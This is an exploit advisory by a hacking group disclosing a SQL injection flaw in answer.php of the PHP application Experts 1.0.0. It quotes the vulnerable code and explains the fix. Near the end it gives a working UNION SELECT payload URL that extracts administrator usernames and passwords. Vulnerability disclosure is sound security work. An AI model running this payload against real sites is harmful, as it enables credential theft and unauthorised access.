1 =========================================================
2 Experts (answer.php) Remote SQL Injection Vulnerability
3 =========================================================
4
5 ,−−^−−−−−−−−−−,−−−−−−−−,−−−−−,−−−−−−−^−−,
6 | ||||||||| ‘−−−−−−−−’ | O
.. CWH Underground Hacking Team ..
7 ‘+−−−−−−−−−−−−−−−−−−−−−−−−−−−^−−−−−−−−−−|
8 ‘\_,−−−−−−−, _________________________|
9 / XXXXXX /‘| /
10 / XXXXXX / ‘\ /
11 / XXXXXX /\______(
12 / XXXXXX /
13 / XXXXXX /
14 (________(
15 ‘−−−−−−’
16
17 AUTHOR : CWH Underground
18 DATE : 10 June 2008
19 SITE : www.citec.us
20
21
22 #####################################################
23 APPLICATION : Experts
24 VERSION : 1.0.0
25 DOWNLOAD : http://downloads.sourceforge.net/experts
26 #####################################################
27
28 −−−SQL Injection Exploit−−−
29
30 ***magic_quotes_gpc = off***
31
32 ##################################################################################
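33 Vulnerable code (answer.php, lines 67-76): $question_id is concatenated into the query as a bare, unquoted value (line 74), and a failed query prints mysql_error() to the response (line 76). Because the value sits outside any quotes, quote escaping alone does not protect it; the fix is to cast question_id to an integer or bind it as a query parameter, and to log query errors instead of displaying them.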
34 67: $con= "SELECT question_text, question_expert, question_category, question_closed,
35 68: TIME_TO_SEC(TIMEDIFF(NOW(),question_date)) AS seconds_ago,
36 69: user_login, user_id, category_name, expert_login
37 70: FROM question
38 71: INNER JOIN (user,category, expert)
39 72: ON (question_user=user_id
40 73: AND question_category=category_id AND question_expert=expert_id )
41 74: WHERE question_id=".$question_id;
42 75: //echo $con."<br>";
43 76: $fai_con=mysql_query($con) or die(mysql_error());
44 ##################################################################################
45
46 EXPLOIT:
47
48 http://[Target]/[experts_path]/answer.php?question_id=41 AND 1=2 UNION SELECT concat(administrator_login,0x3a,adminis
trator_password),2,3,4,5,6,7,8,9 FROM administrator
49
50
51 ##################################################################
52 # Greetz: ZeQ3